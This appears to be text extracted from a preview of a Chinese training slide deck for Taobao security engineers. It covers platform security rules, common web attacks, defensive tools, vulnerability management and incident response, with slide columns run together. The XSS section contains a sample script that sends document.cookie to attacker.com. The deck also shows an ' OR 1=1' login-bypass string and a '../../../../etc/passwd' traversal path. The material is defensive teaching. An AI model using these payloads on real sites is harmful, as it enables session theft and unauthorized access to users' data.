还剩28页未读,继续阅读
本资源只提供10页预览,全部文档请下载后查看!喜欢就下载吧,查找使用更方便
文本内容:
淘宝安全工程师培训课件课程内容导航010203淘宝安全工程师职责与定位淘宝开放平台安全规范常见安全威胁与攻击手法了解安全工程师在淘宝生态中的核心角色与使命掌握平台安全标准与合规要求识别和理解各类网络安全威胁040506安全防护技术与工具安全运营与应急响应案例分析与实战演练学习实战防护技术与工具应用建立完善的安全运营体系通过真实案例提升实战能力未来安全趋势与能力提升第一章淘宝安全工程师职责与定位安全工程师是淘宝平台安全体系的核心守护者,承担着保护数亿用户和商家数据安全的重要使命在日益复杂的网络安全环境下,安全工程师需要具备全面的技术能力和敏锐的安全意识淘宝安全工程师的核心职责保障平台及应用数据安全识别并防范安全风险负责淘宝平台核心数据资产的安全防护,包括用户个人信息、交易数据、持续监控和评估平台面临的各类安全威胁,进行风险识别、分析和评估商业机密等敏感信息的全生命周期保护通过建立多层次的数据安全运用专业的安全工具和方法,主动发现系统漏洞、配置缺陷和潜在的安防护体系,确保数据在采集、传输、存储、使用和销毁等各个环节的安全隐患,并制定相应的风险应对策略全性设计并实施安全防护方案参与安全事件响应与处置根据业务特点和安全需求,设计并实施全面的安全防护体系包括网络建立快速响应机制,在安全事件发生时能够迅速定位问题、控制影响范安全、应用安全、数据安全等多个维度的技术方案,确保安全措施既有围、恢复业务运行参与事件调查分析,总结经验教训,持续优化安全效又不影响业务正常运行防护能力淘宝开放平台安全生态开放平台简介用户隐私保护与合规要求TOP淘宝开放平台是连接第三方开发者与淘宝生态的重要桥梁通过开放API在《网络安全法》、《数据安全法》、《个人信息保护法》等法律法规接口,允许开发者为商家提供各类增值服务和应用工具平台每天处理海的框架下,淘宝平台建立了严格的用户隐私保护机制所有应用必须遵循量的API调用请求,涉及商品管理、订单处理、营销推广等多个业务场景最小必要原则收集用户信息,明确告知用户数据使用目的,并获得用户明确授权开发者与应用安全责任平台要求所有接入应用完成等保备案,定期进行安全评估,确保符合国家网络安全和数据保护的相关要求对于违反安全规范的应用,平台将采取限开发者在接入淘宝开放平台时,必须遵守严格的安全规范包括妥善保管制调用、下架应用等处罚措施API密钥、确保应用代码安全、保护用户数据隐私等平台会对接入的应用进行安全审核,并持续监控应用的安全状况淘宝开放平台架构示意图淘宝开放平台采用多层次的安全防护架构,从网络边界到应用层再到数据层,构建了全方位的安全防御体系安全防护层贯穿整个平台架构,确保每个环节都有相应的安全控制措施网络边界防护防火墙、DDoS防护应用安全防护WAF、身份认证数据安全防护加密、脱敏、审计第二章淘宝开放平台安全规范详解淘宝开放平台建立了完善的安全规范体系,涵盖数据保护、账号安全、应用防护、日志审计等多个方面这些规范不仅是技术要求,更是保障整个电商生态安全的基础数据保护基本要求个人敏感信息加密传输与存禁止导出用户敏感信息功能订单数据仅限履约场景使用储限制应用系统严禁提供批量导出用户敏感信息订单数据包含大量用户隐私信息和商业敏的功能如业务确需导出数据,必须经过严感信息,只能在订单履约相关场景下使用,包所有涉及用户个人敏感信息的传输必须使格的审批流程,并对导出数据进行脱敏处理括商品发货、物流跟踪、售后服务等严用TLS
1.2以上版本进行加密对于身份证导出操作应记录完整的审计日志,包括操作禁将订单数据用于营销推广、数据分析等号、银行卡号、手机号等高敏感信息,在存人、操作时间、导出数据范围等信息与履约无关的场景储时必须采用不可逆加密算法或脱敏处理禁止以明文形式存储用户密码,必须使用加对订单数据的访问应实施严格的权限控制,盐哈希算法进行处理对于开发和测试环境,禁止使用真实的生产遵循最小权限原则系统应记录所有对订数据如需使用生产数据进行测试,必须先单数据的访问行为,便于事后审计和问题追应用系统在设计时应遵循数据最小化原则,进行脱敏处理,确保无法还原出真实的用户溯只收集业务必需的用户信息,避免过度采集信息对于已收集的敏感数据,应设置合理的保存期限,超期数据应及时进行安全销毁账号安全防护体系淘系账号风控体系接入二次认证强制开启所有应用必须接入淘宝统一的账号风对于涉及资金操作、敏感信息修改等控体系,利用平台的风险识别能力,对高风险操作,必须启用二次认证机制异常登录、账号盗用等风险进行实时支持短信验证码、动态令牌、生物识检测和拦截风控系统基于大数据分别等多种认证方式,提升账号安全等级析和机器学习算法,能够识别各类异常行为模式弱密码检测与生命周期管理系统应实施密码强度检测,拒绝弱密码的设置强制要求密码包含大小写字母、数字和特殊字符,长度不少于8位建立密码定期更换机制,对长期未更换的密码进行提醒应用防护能力建设应用防火墙部署主机入侵防护Web WAFWAF是防护Web应用安全的第一道防线,能够有效防御SQL注入、XSS攻击、CSRF等常在服务器上部署主机入侵防护系统HIPS,实时监控系统见Web攻击所有面向互联网的应用系统必须部署WAF,并根据业务特点配置相应的防行为,检测和阻止恶意程序的运行恶意代码自动检测护规则WAF应具备攻击检测、流量清洗、访问控制等核心功能通过机器学习算法,WAF可以建立恶意代码检测机制,对上传文件、外部输入等进行实识别和拦截0day攻击和未知威胁互联网边界防火墙与接入时扫描,防止恶意代码植入系统SASE在网络边界部署下一代防火墙,实现精细化的访问控制和流量监控通过SASE安全访问服务边缘架构,为远程办公人员提供安全的网络接入能力,确保数据传输的安全性安全审计与日志管理用户登录及操作日志保存日志留存不少于天180完整记录用户的登录行为,包括登录时间、IP地址、登录方式、登录结果等根据国家相关法律法规要求,所有安全日志必须至少保存180天对于重要系对于敏感操作,如数据修改、权限变更、配置调整等,必须记录详细的操作日统和敏感数据,建议延长日志保存周期至1年以上,以满足审计和调查需要志,包括操作人、操作时间、操作内容、操作结果等123日志回传御城河平台所有应用系统的安全日志必须实时回传到淘宝统一的安全监控平台御城河平台提供集中化的日志存储、分析和告警能力,能够快速发现和响应安全事件安全运营管理体系漏洞跟踪与快速修复机制小时安全应急响应团队安全意识培训与权限管控7×24建立完善的漏洞管理流程,从漏洞发现、评估、组建专业的安全应急响应团队,提供全天候的安定期开展安全意识培训,提升全员的安全防范意修复到验证,形成闭环管理对于高危漏洞,要求全监控和事件响应服务团队成员需要具备丰富识培训内容包括常见攻击手法识别、安全操作在24小时内完成修复;中危漏洞在7天内完成修复;的安全攻防经验,能够快速定位和处理各类安全规范、应急响应流程等实施严格的权限管理,低危漏洞在30天内完成修复使用专业的漏洞管事件建立值班制度和应急预案,确保在安全事遵循最小权限原则,定期审查和调整用户权限,防理工具进行跟踪,确保每个漏洞都得到妥善处理件发生时能够第一时间响应止权限滥用运维安全要求12禁止弱口令密码不可逆加密系统脆弱性检测与管理,所有系统账号必须使用强密码,禁止使用admin、123456等弱口令密码必须采用定期进行系统漏洞扫描和渗透测试,及时发现系统存在的安全隐患使用自动化工不可逆加密算法存储,推荐使用bcrypt、PBKDF2等安全哈希算法对于特权账号,具进行持续的安全检测,包括操作系统漏洞、应用程序漏洞、配置缺陷等建立漏应实施更严格的密码策略洞修复优先级机制,确保高危漏洞得到优先处理34网络访问细粒度控制防护能力DDoS实施网络隔离和访问控制策略,将生产环境、测试环境、开发环境进行物理或逻辑部署专业的DDoS防护系统,能够识别和缓解各类DDoS攻击,包括SYN Flood、隔离基于最小权限原则配置网络访问规则,只允许必要的网络通信使用防火墙、UDP Flood、HTTP Flood等建立流量基线,对异常流量进行实时检测和清洗ACL等技术手段实现精细化的访问控制与专业的DDoS防护服务提供商合作,提升大流量攻击的防护能力第三章常见安全威胁与攻击手法在互联网环境中,Web应用面临着各种各样的安全威胁了解这些攻击手法的原理和特征,是构建有效防护体系的基础本章将详细介绍几种最常见的Web安全威胁,帮助安全工程师建立全面的防护意识跨站脚本攻击XSS攻击类型与区别攻击流程与危害XSS反射型XSS:攻击代码通过URL参数传入,服务器将恶意脚本直接反射到用户浏览攻击者通过精心构造的恶意脚本,窃取用户Cookie、会话令牌等器中执行这是最常见的XSS类型,通常通过钓鱼链接传播敏感信息,或者伪造用户身份执行恶意操作防御措施存储型XSS:攻击代码被存储在服务器数据库中,当其他用户访问包含恶意脚本的页面时,脚本会在用户浏览器中执行危害范围更广,影响所有访问该页面的用户•对所有用户输入进行严格的过滤和转义•使用Content SecurityPolicyCSP限制脚本执行DOM型XSS:攻击发生在客户端,通过修改页面DOM结构来执行恶意脚本不经•设置HttpOnly标志保护Cookie过服务器处理,难以通过服务器端过滤防护•对输出内容进行HTML编码script//XSS攻击示例document.location=http://attacker.com/stealcookie=+document.cookie;/script注入攻击SQL攻击原理与典型案例SQL注入是最危险的Web应用安全漏洞之一攻击者通过在输入字段中插入恶意SQL代码,破坏原有SQL语句的结构,从而实现未授权的数据库访问攻击者可以绕过身份验证、读取敏感数据、修改或删除数据,甚至获取数据库服务器的控制权OR1=1典型案例:攻击者在登录表单的用户名字段输入,如果应用直接拼接SQL语句,将导致身份验证被绕过,允许攻击者以任意用户身份登录系统防护策略输入验证使用参数化查询:采用预编译语句和参严格的输入校验:对所有用户输入进行数绑定,将SQL代码和数据严格分离,从白名单验证,拒绝包含特殊字符的输入根本上防止SQL注入使用ORM框架可以在一定程度上降低SQL注入风险最小权限原则数据库权限控制:应用程序使用的数据库账号应只拥有必要的权限,避免使用root或管理员账号连接数据库攻击跨站请求伪造CSRF攻击机制解析防御方案验证TokenCSRF攻击利用用户已登录的身份,诱使用户在不知情的情况下执行非本意的操作攻击者构造恶意请求,当用户访问攻击者控制的网站时,该请求会在表单中加入随机生成的CSRF Token,服务器验证Token的有效性携带用户的认证信息自动发送到目标网站Token应该是不可预测的,并且与用户会话绑定检查Referer攻击场景包括:未经授权的资金转账、修改账号信息、发布恶意内容等由于请求来自真实用户的浏览器,服务器难以区分是否为用户的真实意图验证HTTP请求的Referer头,确保请求来自可信的源但该方法存在一定局限性,因为Referer可能被篡改或不发送SameSite Cookie设置Cookie的SameSite属性,限制第三方网站发送Cookie,从根本上防止CSRF攻击文件上传与目录遍历漏洞文件上传漏洞风险不安全的文件上传功能是Web应用中的高危漏洞攻击者可以上传恶意脚本文件如WebShell,获取服务器控1制权常见的攻击手法包括:修改文件扩展名绕过检测、利用解析漏洞执行脚本、上传超大文件导致拒绝服务等真实案例中,攻击者上传了伪装成图片的PHP脚本,通过访问该文件获得了服务器的完全控制权,导致大量敏感数据泄露目录遍历攻击../2目录遍历漏洞允许攻击者访问Web根目录之外的文件和目录攻击者通过构造包含的路径,向上遍历目录结构,读取系统配置文件、源代码、数据库连接信息等敏感内容../../../../etc/passwd例如,访问可能导致Linux系统密码文件泄露安全上传策略3实施白名单机制,只允许特定类型的文件上传验证文件的真实类型,不能仅依赖扩展名将上传文件存储在非Web可访问目录,或使用独立的文件存储服务对上传文件进行病毒扫描和内容检测重命名上传文件,使用随机生成的文件名路径校验措施
4.././对所有文件路径进行严格校验,拒绝包含、等特殊字符的路径使用白名单限制可访问的目录范围将用户输入的路径转换为绝对路径后,验证是否在允许的范围内在系统层面设置适当的文件访问权限,限制Web应用的文件访问能力账号劫持与暴力破解秒73%89%15弱密码账号占比防护有效性平均攻击间隔MFA研究表明,超过70%的用户使用弱密码或重复密码,启用多因素认证可以阻止近90%的账号劫持攻击自动化工具可在极短时间内尝试大量密码组合极易被破解账号劫持手段多因素认证的重要性攻击者通过钓鱼网站、键盘记录器、数据库泄露等方式获取用户凭证利用MFA要求用户提供两个或多个验证因素,即使密码泄露,攻击者也无法登录账撞库攻击,使用从其他网站泄露的账号密码尝试登录社会工程学攻击诱骗号支持短信验证码、动态令牌、生物识别等多种认证方式,显著提升账号用户泄露账号信息安全性第四章安全防护技术与工具构建完善的安全防护体系需要综合运用多种技术和工具从网络层到应用层,从事前防御到事后响应,形成多层次、立体化的安全防护能力本章将介绍淘宝平台使用的核心安全技术和工具应用防火墙实战Web WAF功能与部署架构防爬虫与恶意请求过滤WAFWAF作为Web应用的安全网关,通过深度检测HTTP/HTTPS流量,淘宝平台每天面临海量的爬虫访问,消耗系统资源并可能导致数据泄露WAF通过以识别和阻断各类Web攻击部署模式包括:下技术识别和限制爬虫行为:透明代理模式:对应用无感知,部署灵活行为特征分析:识别高频访问、固定访问模式等爬虫特征反向代理模式:提供更强的控制能力设备指纹技术:通过浏览器特征识别自动化工具云WAF服务:利用云端资源,应对大规模攻击人机验证:对可疑请求触发验证码挑战WAF支持自定义规则,可根据业务特点配置精准的防护策略通过IP信誉系统:基于IP历史行为进行风险评分机器学习算法,WAF能够识别异常行为模式,防御未知威胁速率限制:限制单个来源的请求频率,防止资源滥用身份识别与访问管理IDAAS统一身份认证账号生命周期管理提供单点登录SSO能力,用户通过一次认证即可访问所有授权的应用系统支持多种认证协从账号创建、权限分配、定期审查到账号注销,议,包括SAML、OAuth、OIDC等实现全生命周期的自动化管理确保离职人员权限精细化控制账号及时回收,临时账号自动过期基于角色的访问控制RBAC和属性的访问控制ABAC,实现细粒度的权限管理支持动快速响应处置态权限调整,适应业务变化异常行为检测发现异常行为后,系统可自动冻结账号、撤销权限、通知管理员等提供详细的审计日志,建立用户行为基线,识别异常登录位置、异常支持事件调查和取证访问时间、异常操作行为等风险信号触发二次验证或自动阻断可疑操作加密技术与数据脱敏传输层加密数据库加密实践数据脱敏技术TLS所有涉及敏感数据的通信必须使用TLS
1.2或更敏感数据在数据库中必须加密存储采用透明数数据脱敏是在保持数据可用性的前提下,对敏感高版本进行加密TLS通过非对称加密交换密钥,据加密TDE保护整个数据库文件,使用列级加密信息进行变形处理常用脱敏方法包括:掩码手使用对称加密保护数据传输,确保数据在传输过保护特定敏感字段密钥管理是加密系统的核心,机号显示为138****
5678、替换用随机数据替程中的机密性和完整性正确配置TLS参数,禁用使用专业的密钥管理系统KMS进行密钥的生成、换真实数据、洗牌打乱数据关联关系、加密不安全的加密套件,使用可信CA颁发的证书存储、轮换和销毁定期更换加密密钥,采用密可逆的脱敏方式根据使用场景选择合适的脱钥分离原则,确保密钥与加密数据分开存储敏策略,生产环境使用真实数据,测试和开发环境使用脱敏数据安全测试与渗透测试等保测评要求第三方渗透测试流程根据《网络安全等级保护条例》,淘宝平台核心系统需要达到等保三级或定期邀请专业的安全公司进行渗透测试,从攻击者角度发现系统安全弱点:以上要求等保测评包括:范围确定:明确测试目标、边界和禁止事项•物理安全:机房环境、设备安全信息收集:收集目标系统的公开信息•网络安全:网络架构、访问控制、入侵防范漏洞扫描:使用工具进行自动化扫描•主机安全:操作系统加固、恶意代码防范漏洞验证:人工验证和利用发现的漏洞•应用安全:身份认证、访问控制、安全审计权限提升:尝试获取更高级别的系统权限•数据安全:数据备份、加密、完整性报告编写:详细记录发现的问题和修复建议系统上线前必须完成等保测评,并每年进行复测测评过程中发现的安全根据渗透测试报告,制定整改计划,修复发现的安全问题,并进行复测验证问题必须及时整改第五章安全运营与应急响应安全不是一次性的项目,而是持续的过程建立完善的安全运营体系,能够及时发现和处置安全威胁,最大限度地降低安全事件的影响本章将介绍淘宝平台的安全运营实践和应急响应机制漏洞管理流程漏洞发现漏洞评估通过多种渠道发现系统漏洞:自动化扫描工具、渗透测试、安全研究人员报告、使用CVSS通用漏洞评分系统对漏洞进行评分,综合考虑漏洞的危害程度、利厂商安全公告等建立漏洞收集平台,鼓励内部员工和外部安全研究者报告安用难度、影响范围等因素将漏洞分为严重、高危、中危、低危四个等级,确全问题定修复优先级漏洞修复修复验证根据漏洞等级制定修复时间表:严重漏洞24小时内修复,高危漏洞7天内修复,漏洞修复后,安全团队进行验证测试,确认漏洞已被彻底修复使用渗透测试中危漏洞30天内修复开发团队编写修复代码,经过测试后部署到生产环境工具尝试重现漏洞,验证防护措施的有效性记录整个处理过程,总结经验教对于无法立即修复的漏洞,采取临时防护措施训高危漏洞24小时响应机制:对于严重威胁系统安全的高危漏洞,启动应急响应流程安全团队、开发团队、运维团队协同工作,在24小时内完成漏洞修复和验证必要时,可临时下线受影响的功能或服务,确保用户数据安全安全事件响应事件检测与分类1通过安全监控系统、入侵检测系统、日志分析等手段,及时发现安全异常将事件分为:攻击事件DDoS攻击、漏洞利用、违规事件数据泄露、权限滥用、2事件分级故障事件系统宕机、服务中断等类型根据事件的影响范围和严重程度,分为四个等级:特别重大影响全平台,大规模现场处置3数据泄露、重大影响核心业务,部分用户数据泄露、较大影响单个业务,小范围数据泄露、一般影响有限,可快速恢复确认事件后立即启动应急响应:隔离受影响系统,阻断攻击源,保护现场证据成立应急小组,明确职责分工分析攻击手法和影响范围,制定处置方案通4恢复与总结知相关业务部门和管理层,必要时对外发布公告修复系统漏洞,清除恶意代码,恢复业务运行验证系统安全性,确保攻击者无法再次入侵编写事件分析报告,总结经验教训优化安全防护措施,防止类似事件再次发生对相关人员进行培训,提升安全意识和应急响应能力安全日志分析与告警日志采集与分析工具告警规则设计与响应部署集中化的日志管理平台,实时采集来自各个系统的安全日志:基于威胁情报和历史攻击模式,设计智能告警规则:•网络设备日志异常登录告警:检测异地登录、深夜登录、多次失败尝试等异常行为•安全设备日志防火墙、WAF、IDS攻击行为告警:识别SQL注入、XSS攻击、暴力破解等攻击特征•服务器日志数据异常告警:监控大批量数据导出、敏感数据访问等异常操作•应用程序日志•数据库审计日志系统异常告警:检测系统性能异常、服务中断、配置变更等情况使用大数据分析技术,对海量日志进行关联分析,发现隐藏的安全威胁告警应包含足够的上下文信息,帮助安全人员快速判断和处置建立告警升级机制,确保重要告警得到及时响应使用机器学习算法减少误报,提高告警准确性第六章案例分析与未来趋势通过真实安全事件的复盘,我们可以汲取宝贵的经验教训,不断完善安全防护体系同时,网络安全技术日新月异,新的威胁和挑战不断涌现,安全工程师需要保持学习和进步,才能更好地保护淘宝平台的安全典型案例分享与未来展望真实安全事件复盘案例:第三方应用数据泄露事件某接入淘宝开放平台的第三方应用,因未严格遵守安全规范,将用户数据明文存储在公网可访问的数据库中,导致数万条用户信息泄露教训:平台立即暂停该应用的API调用权限,通知受影响用户修改密码,并加强了对第三方应用的安全审查和监控此事件促使平台建立了更严格的应用准入机制和定期安全检查制度改进措施:要求所有应用必须通过安全测评才能上线,定期进行渗透测试,建立应用安全评分体系,对低分应用进行整改或下架新兴威胁与技术趋势AI驱动的攻击:攻击者利用机器学习算法自动发现漏洞、生成钓鱼内容,攻击更加智能化和自动化供应链安全:第三方组件和开源软件的安全问题日益突出,需要建立完善的供应链安全管理体系零信任架构:传统的边界安全模型已不足以应对复杂的威胁环境,零信任成为新的安全架构趋势隐私计算:在保护数据隐私的前提下实现数据价值,联邦学习、安全多方计算等技术快速发展云原生安全:容器、微服务等云原生技术带来新的安全挑战,需要专门的安全解决方案安全工程师能力提升路径技术能力:深入学习网络协议、操作系统、编程语言、密码学等基础知识掌握常见的攻击手法和防护技术,熟悉各类安全工具的使用实战经验:参与CTF竞赛、漏洞挖掘、应急响应等实战演练,积累解决实际问题的经验持续学习:关注安全领域的最新动态,学习新技术、新工具、新思路参加安全会议和培训,与同行交流经验安全意识:培养敏锐的安全直觉,能够从攻击者角度思考问题,主动发现潜在风险沟通协作:安全工作需要与各个团队密切合作,良好的沟通能力和团队协作精神至关重要️结语:共筑安全淘宝生态网络安全是一项长期而艰巨的任务,需要平台、开发者、用户共同努力作为淘宝安全工程师,我们肩负着保护数亿用户和商家数据安全的重要使命让我们以专业的技术能力、敏锐的安全意识、强烈的责任心,共同构建安全可信的电商生态环境通过持续学习和创新,不断提升安全防护能力,为淘宝平台的健康发展保驾护航安全无小事,防护在日常让我们携手共进,为打造更安全的淘宝平台而努力!。
个人认证
优秀文档
获得点赞 0